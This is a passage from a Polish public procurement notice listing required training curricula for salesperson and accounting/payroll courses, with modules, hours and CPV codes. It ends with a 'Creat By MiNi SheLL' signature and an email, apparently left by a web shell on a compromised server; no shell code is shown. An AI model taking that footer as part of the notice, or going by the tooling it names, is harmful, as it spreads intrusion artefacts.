1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży (kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1) przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 6 godzin,   zawierająca następujące jednostki szkoleniowe:
- poznaje ogólne przepisy bhp obowiązujące w jednostce handlowej;
- udzielanie pierwszej pomocy w miejscu wypadku.
2) organizacja handlu w gospodarce rynkowej - minimum 30 godzin, zawierająca następujące jednostki szkoleniowe:
- zapoznanie z podstawowymi pojęciami obowiązującymi w jednostce handlowej;
- podejmowanie działalności gospodarczej; 
- poznawanie otoczenia przedsiębiorstwa handlowego;
- marketing i reklama w handlu detalicznym.
3) wyposażenie punktu sprzedaży detalicznej - minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- rodzaje punktów sprzedaży i ich charakterystyka;
- wyposażanie punktu sprzedaży detalicznej.
4) organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 20 godzin, zawierająca następujące jednostki szkoleniowe:
- zaopatrzenie i zakup towarów w jednostce handlu detalicznego;
- organizacja gospodarki magazynowej;
- rozmieszczanie i przechowywanie towarów w jednostkach handlu detalicznego.
5) wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum 25 godzin, zawierająca następujące jednostki szkoleniowe:
- obliczenia sklepowe;
- kształtowanie cen w jednostkach sprzedaży;
- inkasowanie należności za sprzedane produkty;
- wypełnianie dokumentacji związanej ze sprzedażą.
6) obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 12 godzin, zawierająca następujące jednostki szkoleniowe:
- obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży;
- zawieranie transakcji sprzedaży;
- dekorowanie wnętrza sklepu i okna wystawowego.
2. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych - minimum  15 godzin,
3. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
4. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej - 	minimum  30 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 7 godzin;
6. jednostkę modułową: sprzedaż internetowa- minimum 7 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakres III:  Księgowość z elementami kadr i płac - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 180, w tym minimum  130 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) ogólne zasady rachunkowości, zawierająca następujące jednostki szkoleniowe:
- regulacje prawne rachunkowości;
- istota i zakres rachunkowości;
- zasady rachunkowości
2) środki gospodarcze i źródła ich pochodzenia, zawierająca następujące jednostki szkoleniowe:
- istota i zakres majątku trwałego;
- struktura majątku obrotowego;
- treść i formy organizacyjno-prawne kapitałów własnych;
- struktura kapitałów obcych;
- treść, układ, cechy bilansu
3) ewidencja operacji gospodarczych, zawierająca następujące jednostki szkoleniowe:
- operacje gospodarcze i ich wpływ na bilans;
- istota i rodzaje kont księgowych;
- funkcjonowanie kont księgowych;
- wynik finansowy;
- poprawianie błędów księgowych;
- rozdzielność i łączenie kont
4)organizacja rachunkowości w jednostkach gospodarczych, zawierająca następujące jednostki                         szkoleniowe:
- plan kont;
- zadania i klasyfikacja dokumentów;
- powstanie i wykorzystanie dokumentu księgowego;
- obieg i archiwizowanie dokumentów
5) ogólne zasady inwentaryzacji, zawierająca następujące jednostki szkoleniowe:
- regulacje prawne inwentaryzacji;
- istota i zadania inwentaryzacji;
- rodzaje inwentaryzacji i metody jej przeprowadzania;
- przygotowanie jednostki gospodarczej do inwentaryzacji
6)ewidencja obrotu gotówkowego, zawierająca następujące jednostki szkoleniowe:
- prowadzenie obrotu gotówkowego;
- sporządzanie asygnat kasowych;
- sporządzanie bankowego dowodu wpłaty;
-  sporządzanie raportu kasowego;
- zasady przewozu i przechowywania gotówki;
- ewidencja księgowa obrotu gotówkowego
7)ewidencja obrotu bezgotówkowego, zawierająca następujące jednostki szkoleniowe:
- formy i zasady obrotu bezgotówkowego;
- sporządzanie polecenia przelewu;
- sporządzanie czeku rozrachunkowego;
- akredytywa;
- ewidencja księgowa obrotu bezgotówkowego;
- ewidencja kredytów bankowych
8) ewidencja innych środków pieniężnych, zawierająca następujące jednostki szkoleniowe:
istota i formy innych środków pieniężnych;
obrót wekslowy;
ewidencja księgowa innych środków pieniężnych
9) sporządzanie list płac i rozdzielników, zawierająca następujące jednostki szkoleniowe:
formy płac i systemy wynagrodzeń;
karty pracy - wynagrodzeń;
wynagrodzenia za urlopy wypoczynkowe i okolicznościowe;
wynagrodzenie brutto;
wynagrodzenie za okres niezdolności do pracy z tytułu choroby;
potrącenie na liście płac;
inne świadczenia wynikające ze stosunku pracy;
wypłaty z tytułu umowy zlecenia  i o dzieło;
podział płac i narzutów;
indywidualne karty wynagrodzeń
10) sporządzanie list zasiłków i deklaracji ZUS, zawierająca następujące jednostki szkoleniowe:
podstawa wymiaru zasiłku;
wysokość i wpłata zasiłku chorobowego;
zasiłek macierzyński i porodowy;
zasiłek opiekuńczy;
zasiłek wychowawczy;
ustalenie dochodu do zasiłku rodzinnego;
wypłata zasiłku rodzinnego i pielęgnacyjnego;
podstawa składek;
wysokość składek;
deklaracje rozliczeniowe ZUS;
rozliczanie składek i świadczeń
11) rozliczanie podatku dochodowego od osób fizycznych, zawierająca następujące jednostki szkoleniowe:
koszty uzyskania przychodu;
stawki podatku dochodowego;
ustalenie zaliczki na podatek dochodowy;
deklaracje miesięczne podatku dochodowego;
roczne rozliczenie podatku dochodowego
12) ewidencja rozrachunków z tytułu VAT, zawierająca następujące jednostki szkoleniowe:
- podatnicy VAT;
- czytanie podlegające opodatkowaniu/zwolnieniu;
- stawki podatku VAT;
- dowody stanowiące podstawę odliczenia VAT naliczonego;
- rejestr zakupu VAT;
- ustalenie podatku do odliczenia;
- rejestr sprzedaży VAT;
- księgowe ujęcie rozrachunków z tytuł VAT;
- deklaracje podatku od towarów i usług;
- analiza konta rozrachunków z tytułu VAT

13) ewidencja rozrachunków z dostawcami, zawierająca następujące jednostki szkoleniowe:
wpisywanie dokumentów zakupu do rejestru;
sprawdzenie dokumentów zobowiązań wb. dostawców;
księgowe ujęcie rozrachunków z dostawcami;
analizowanie rozrachunków z dostawcami
14) ewidencja rozrachunków z odbiorcami, zawierająca następujące jednostki szkoleniowe:
- sporządzanie dokumentów rozrachunku z odbiorcami z tytułu sprzedaży produktów;
- naliczanie odsetek, kar umownych, odszkodowań w związku z niedotrzymaniem warunków umowy;
- księgowe ujęcie rozrachunków z odbiorcami;
- analizowanie i weryfikacja rozrachunków z odbiorcami
15) ewidencja rozrachunków z pracownikami, zawierająca następujące jednostki szkoleniowe:
- księgowe ujęcie rozrachunków z tytułu wynagrodzeń;
- księgowe ujęcie innych rozrachunków z pracownikami;
- analizowanie rozrachunków z pracownikami
16) ewidencja rozrachunków publiczno - prawnych, zawierająca następujące jednostki szkoleniowe:
- rozrachunki z Urzędem Skarbowym;
- rozrachunki z ZUS;
- rozrachunki z innymi instytucjami publiczno-prawnymi;
- analizowanie innych rozrachunków publiczno-prawnych
17)   ewidencja pozostałych rozrachunków, zawierająca następujące jednostki szkoleniowe:
- rozrachunki z udziałowcami i akcjonariuszami;
- tytuły pozostałych rozrachunków;
- księgowe ujęcie pozostałych rozrachunków;
- obroty kont rozrachunkowych;
- salda kont pozostałych rozrachunków;
- windykacja należności;
- odsetki od nieterminowej realizacji zobowiązań
18)   ewidencja roszczeń, zawierająca następujące jednostki szkoleniowe:
 roszczenia z tytułu niedoborów i szkód;
roszczenia z tytułu kwestionowanych należności;
 dokumentacja dochodzenia roszczeń;
 rezerwy należności;
księgowe ujęcie roszczeń i rezerw
19)   ewidencja roszczeń barterowych, zawierająca następujące jednostki szkoleniowe:
relacje wymiany barterowej;
wycena transakcji barterowej;
księgowe ujęcie transakcji barterowych
20)   ewidencja inwestycji, zawierająca następujące jednostki szkoleniowe:
- koszty inwestycji;
- zakres rzeczowy inwestycji;
- wartość początkowa środków trwałych oddanych do użytkowania przed i po zakończeniu inwestycji;
- wartość inwestycji nie dających efektu gospodarczego;
-  księgowe ujęcie inwestycji
21)   ewidencja środków trwałych,  zawierająca następujące jednostki szkoleniowe:
- klasyfikacja środków trwałych;
- wartość początkowa środków trwałych;
- metody amortyzacji środków trwałych;
- amortyzacja środków trwałych używanych i ulepszonych;
- zasady aktualizacji wartości początkowej środków trwałych;
- dokumentacja środków trwałych;
- ewidencja księgowa środków trwałych;
- ewidencja szczegółowa środków trwałych.
22)   ewidencja finansowego majątku trwałego, zawierająca następujące jednostki szkoleniowe:
- składniki finansowego majątku trwałego;
- wartość początkowa finansowanego majątku trwałego;
- księgowe ujęcie finansowego majątku trwałego;
- różnice powstałe na dzień bilansowy przy wycenie finansowego majątku trwałego;
- odpisy aktualizujące wartość początkową finansowanego majątku trwałego.
23)   ewidencja wartości niematerialnych i prawnych, zawierająca następujące jednostki szkoleniowe:
- charakterystyka wartości niematerialnych i prawnych;
- wartość początkowa wartości niematerialnych i prawnych;
- amortyzacja wartości niematerialnych i prawnych;
- księgowe ujęcie wartości niematerialnych i prawnych, 
24)   ewidencja leasingu, zawierająca następujące jednostki szkoleniowe:
- rodzaje leasingu;
- VAT w leasingu operacyjnym;
- VAT w leasingu finansowym;
- metody amortyzacji środków trwałych;
- księgowe ujęcie leasingu operacyjnego i finansowego.
25)   ewidencja i rozliczanie zakupu towarów i opakowań, zawierająca następujące jednostki szkoleniowe:
- kontrola dokumentów zakupu i przyjęcia towarów i opakowań;
- marże handlowe;
- odchylenia od cen ewidencyjnych towarów;
- wycena i rozliczenie inwentaryzacji;
- księgowe ujęcie dokumentów zakupu towarów i opakowań. 
26)   ewidencja zakupu usług, zawierająca następujące jednostki szkoleniowe:
- kontrola dokumentów zakupu usług; 
- księgowe ujęcie dokumentów zakupu usług.
27)   ewidencja i rozliczanie zakupu materiałów, zawierająca następujące jednostki szkoleniowe:
- kontrola dokumentów dotyczących zakupu materiałów;
- ceny ewidencyjne materiałów;
- rozliczenie inwentaryzacji; 
- księgowe ujęcie zakupu materiałów.
28)   ewidencja zużycia materiałów, zawierająca następujące jednostki szkoleniowe:
- wycena dowodów rozchodu materiałów;
- rozliczanie odchyleń od cen ewidencyjnych i kosztów zakupu;
- księgowe ujęcie rozchodu - zużycia materiałów. 
29)   rozliczenie kosztów handlowych,  zawierająca następujące jednostki szkoleniowe:
- ewidencja kosztów rodzajowych;
- rozdzielniki kosztów; 
- współczynniki kosztów zakupu i zarządu;
- rozliczenie międzyokresowe kosztów. 
30)   ewidencja i rozliczenie kosztów przedsiębiorstwa, zawierająca następujące jednostki szkoleniowe:
- deklaracja dokumentów na konta kosztów;
- księgowanie dowodów na konta kosztów;
- rozliczenie kosztów produkcji pomocniczych; 
- rozliczenie międzyokresowe kosztów;
- rozliczenie kosztów zarządu;
- układ kalkulacyjny kosztów produkcji.
31)   kalkulacja kosztu jednostkowego produktu, zawierająca następujące jednostki szkoleniowe:
-obliczanie ilości produktów; 
-kalkulacja podziałowa prosta; 
-kalkulacja podziałowa ze współczynnikiem;
-kalkulacja doliczeniowa; 
-rozliczenie kosztów produkcji;
-obliczenie odchyleń od cen ewidencyjnych wyrobów gotowych. 
32)   ewidencja wyrobów gotowych, zawierająca następujące jednostki szkoleniowe:
- ewidencja przychodu wyrobów gotowych; 
- ewidencja rozchodu wyrobów gotowych;
- wycena arkuszy inwentaryzacji wyrobów gotowych;
- zestawienie różnic inwentaryzacyjnych;
- księgowanie różnic inwentaryzacyjnych.
33)   ewidencja sprzedaży towarów,  zawierająca następujące jednostki szkoleniowe:
- dokumenty sprzedaży towarów;
- konta księgowe sprzedaży towarów;
- odchylenia od cen ewidencyjnych; 
- wynik na sprzedaży towarów. 
34)   ewidencja sprzedaży usług, zawierająca następujące jednostki szkoleniowe:
- dokumenty sprzedaży usług;
- konta księgowe sprzedaży usług;
- wynik na sprzedaży usług.
35)   ewidencja sprzedaży wyrobów gotowych, zawierająca następujące jednostki szkoleniowe:
- dokumenty sprzedaży wyrobów gotowych;
- wybór kont księgowych sprzedaży wyrobów gotowych; 
- odchylenia od cen ewidencyjnych;
- wynik na sprzedaży wyrobów gotowych.
36)  ustalenie wyniku finansowego, zawierająca następujące jednostki szkoleniowe:
- przychody i koszty działalności operacyjnej;
- przychody i koszty działalności finansowej; 
- straty i zyski nadzwyczajne;
- metoda kalkulacyjna ustalania wyniku finansowego;
- metoda porównawcza ustalania wyniku finansowego. 
37) ewidencja wyniku finansowego, zawierająca następujące jednostki szkoleniowe:
- zmiany stanu produktów i ich wpływ na wynik finansowy;
- przeniesienie sald kont przychodów i kosztów na wynik finansowy;
- ewidencja przychodów i kosztów na koncie wynik finansowy ;
- wyznaczenie wyników cząstkowych oraz z całokształtu działalności.
38) podział wyniku finansowego, zawierająca następujące jednostki szkoleniowe:
- ustalenie podatku dochodowego od osób prawnych lub fizycznych; 
- naliczanie dywidendy od funduszu założycielskiego;
- deklaracja podatku dochodowego od osób prawnych lub fizycznych oraz rozliczenie 
dywidendy; 
- przeznaczenie wyniku finansowego w ramach podziału fakultatywnego;
- księgowe rozliczenie wyniku finansowego.
39) ewidencja funduszy i kapitałów własnych, zawierająca następujące jednostki szkoleniowe:
- rodzaje funduszy - kapitałów oraz tytuły ich przeznaczenia; 
- księgowe ujęcie funduszy - kapitałów własnych. 
40) ewidencja funduszy specjalnych, zawierająca następujące jednostki szkoleniowe:
- źródła powstawania funduszy specjalnych oraz tytuły ich przeznaczenia;
- księgowe ujęcie funduszy specjalnych.
41) sporządzanie sprawozdań, zawierająca następujące jednostki szkoleniowe:
- statut i rejestracja jednostki;
- bilansowa sprawozdawczość finansowa; 
- pozostała sprawozdawczość finansowa;
- zakres sprawozdawczości;
- sporządzanie sprawozdań wg określonych wzorów.
42) sporządzanie bilansu, zawierająca następujące jednostki szkoleniowe:
- zamykanie ksiąg rachunkowych;
- wzory druków bilansowych; 
- konta bilansowe pozabilansowe i wynikowe;
- obroty i salda kont analitycznych i syntetycznych;
- grupowanie aktywów wg układu bilansowego; 
- grupowanie pasywów wg układu bilansowego;
- wycena składników bilansowych; 
- zestawienie stanu majątkowego jednostki - bilans;
- dane uzupełniające do bilansu;
- synchronizacja bilansu z innymi sprawozdaniami.
43) sporządzanie sprawozdań z przepływu środków pieniężnych, zawierająca następujące
jednostki szkoleniowe:
-memoriałowa podstawa rachunku;
- kasowa podstawa rachunku;
- standardy rachunku przepływu środków pieniężnych;
- sprawozdanie z przepływu środków pieniężnych. 
44) sporządzanie rachunku zysków i strat,  zawierająca następujące jednostki szkoleniowe:
- istota i treść rachunku wyników;
- wynik finansowy w ujęciu księgowym a rachunek zysków i strat;
- zestawienie przychodów i kosztów w układzie sprawozdania finansowego rachunek zysków i strat.
45) analiza podstawowych wskaźników finansowych, zawierająca następujące jednostki szkoleniowe:
- materiały źródłowe analizy ekonomicznej;
- metody analizy ekonomicznej;
- analiza pionowa i pozioma leasingu;
- analiza pionowa i pozioma rachunku wyników;
- wskaźniki płynności;
- wskaźniki rentowności;
- wskaźniki sprawności działania;
- wskaźniki zarządzania długiem;
- formy prezentacji wyników analizy ekonomicznej.
46)   obsługa komputera w zakresie podstawowym,  zawierająca następujące jednostki szkoleniowe:
- budowa sprzętu komputerowego; 
- operacja na dyskach; 
- operacja na katalogach;
- operacja na plikach; 
- praca w oknach środowiska Windows; 
- zmiana parametrów systemu Windows;
- zarządzanie plikami w Windows; 
- praca z aplikacjami i przenoszenie obiektów w Windows.
- drukowanie dokumentów ze środowiska Windows. 
47)  arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych, zawierająca następujące
 jednostki szkoleniowe:
- podstawy arkusza kalkulacyjnego;
- wprowadzanie i edycja;
- formatowanie; 
- zapisywanie i odczytywanie arkuszy;
- funkcje wbudowane;
- tworzenie wykresów;
-modyfikacja wykresów;
- problemy typu co jeśli;
- scenariusz zdarzeń;
- funkcje trendu;
- drukowanie;
- praca z kilkoma arkuszami.
48)   obsługa programów płacowych, zawierająca następujące jednostki szkoleniowe:
- charakterystyka i budowa programu płace;
- zakładanie katalogów;
- opracowywanie listy płac;
- drukowanie listy płac i przelewów;
- raporty i zestawienia; 
- archiwizacja danych.  
49)   obsługa programów finansowo- księgowych, zawierająca następujące jednostki  szkoleniowe:
- charakterystyka i budowa programu f-k; 
- wprowadzanie danych do katalogów;
- wprowadzanie transakcji do księgi głównej i kasy; 
- wprowadzanie operacji gospodarczych do rejestru należności;
- wprowadzanie operacji gospodarczych do rejestru zobowiązań; 
- drukowanie rejestrów; 
- księgowanie;
- zestawienia;
- raporty finansowe;
- zamykanie okresów; 
- archiwizacja danych.
-- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 40 godzin
2. zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: 
księgowy ds. płac i rozliczeń z ZUS (kod zawodu: 343201):  
1) wynagrodzenie za pracę - minimum 6 godzin, zawierająca następujące jednostki szkoleniowe:
-  płaca - jej funkcje i zasady ;
- elementy i składniki wynagrodzenia za pracę; 
-  minimalne wynagrodzenie za pracę;
-  systemy wynagrodzenia za pracę;
-  wzorcowa lista płac.
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin;  zawierająca
 następujące jednostki szkoleniowe:
- prawo do wynagrodzenia;
- ochrona wynagrodzenia za pracę;  
- wgląd do dokumentacji płacowej; 
- potrącenia z wynagrodzenia za pracę; 
- rozliczenia publicznoprawne;
- odpowiedzialność pracodawcy przy wypłacie wynagrodzeń. 
3) rozliczenie składek ZUS - minimum 6 godzin; zawierająca następujące jednostki szkoleniowe:
- dokumenty zgłoszeniowe, rozliczeniowe i płatnicze; 
- zasady i tryb postępowania w sprawach rozliczenia składek;
- wypełnianie i przekazywanie dokumentów ubezpieczeniowych.
4) zasiłki z ubezpieczenia społecznego - minimum 6 godzin; zawierająca następujące jednostki                                     szkoleniowe:
- zasiłek chorobowy i opiekuńczy;
- świadczenia rehabilitacyjne; 
- zasiłek macierzyński; 
- zasiłki rodzinne, pielęgnacyjne i wychowawcze. 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum 
	6 godzin; zawierająca następujące jednostki szkoleniowe:
- kapitał początkowy - jego istota i zadania 
- wniosek ZUS do pracodawców w sprawie kapitału początkowego; 
- kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego; 
- ustalenie kapitału początkowego.
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy- 
		minimum 20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu
księgowości oraz książkę z zakresu kadr i płac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com